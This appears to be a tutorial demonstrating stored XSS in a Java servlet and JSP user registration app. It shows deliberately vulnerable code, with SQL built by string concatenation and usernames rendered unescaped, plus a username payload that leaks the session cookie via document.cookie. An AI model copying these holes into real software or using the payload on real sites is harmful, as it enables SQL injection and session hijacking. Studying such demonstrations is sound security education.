I spent some time building a user registration page and a user listing page, plus two HttpServlets.
Registration page code:
<form action="register" method="post">
    username:<input type="text" name="username"><br>
    password:<input type="password" name="password"><br>
    phone:<input type="text" name="phone"><br>
    <input type="submit" value="register">
</form>
Registration servlet:
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp)
        throws ServletException, IOException {
    String username = req.getParameter("username");
    String password = req.getParameter("password");
    String phone = req.getParameter("phone");
    // The raw form values are stored as-is; nothing is validated or encoded here,
    // and the SQL is built by string concatenation of user input.
    String insertSQL = "insert into tb_user values ('" + username + "', '"
            + password + "', '" + phone + "')";
    DBUtil.executeSQL(insertSQL);
}
User listing servlet:
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp)
        throws ServletException, IOException {
    String selectSQL = "select username, password, phone from tb_user";
    Statement stmt = null;
    ResultSet rs = null;
    List<User> userList = new ArrayList<User>();
    try {
        stmt = DBUtil.createStatement();
        rs = stmt.executeQuery(selectSQL);
        while (rs.next()) {
            User user = new User(rs.getString(1), rs.getString(2), rs.getString(3));
            userList.add(user);
        }
    } catch (SQLException e) {
        throw new ServletException(e);
    } finally {
        DBUtil.closeResultSet(rs);
        DBUtil.closeStatement(stmt);
    }
    // Hand the stored rows to the JSP, which renders them into the page.
    req.setAttribute("user_list", userList);
    req.getRequestDispatcher("showuser.jsp").forward(req, resp);
}
showuser.jsp:
<body>
<%
    List<User> userList = (List<User>) request.getAttribute("user_list");
    for (int i = 0; i < userList.size(); i++) {
        User user = userList.get(i);
%>
    <%-- The stored username is written into the HTML without escaping:
         this is the stored-XSS sink demonstrated below. --%>
    <div>
        username:<%=user.getUsername() %><br>
        phone:<%=user.getPhone() %><br>
    </div>
<%
    }
%>
</body>
With the username set to `<a href=# onclick="document.location='index.jsp?c='+escape(document.cookie);">Hacker</a>`, the user listing page shows:
The user Hacker is rendered as a link; clicking it shows:
In the browser's address bar the parameter is JSESSIONID%3D7B0C11B6826B67D3E4D9967837F2C48D, so the session id is 7B0C11B6826B67D3E4D9967837F2C48D.
This kind of XSS is persistent (stored) XSS.
How the session id is obtained (index.jsp):
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Insert title here</title>
</head>
<body>
    <%-- Server-side view of the session id, for comparison with the cookie value. --%>
    session id:<%=session.getId()%><br>
    <script type="text/javascript">
        // Client-side view: the JSESSIONID cookie as seen by script on the page.
        document.write(escape(document.cookie));
    </script>
</body>
</html>
session id:9A7A5F89EBFC598FEC18FC003706A899 JSESSIONID%3D9A7A5F89EBFC598FEC18FC003706A899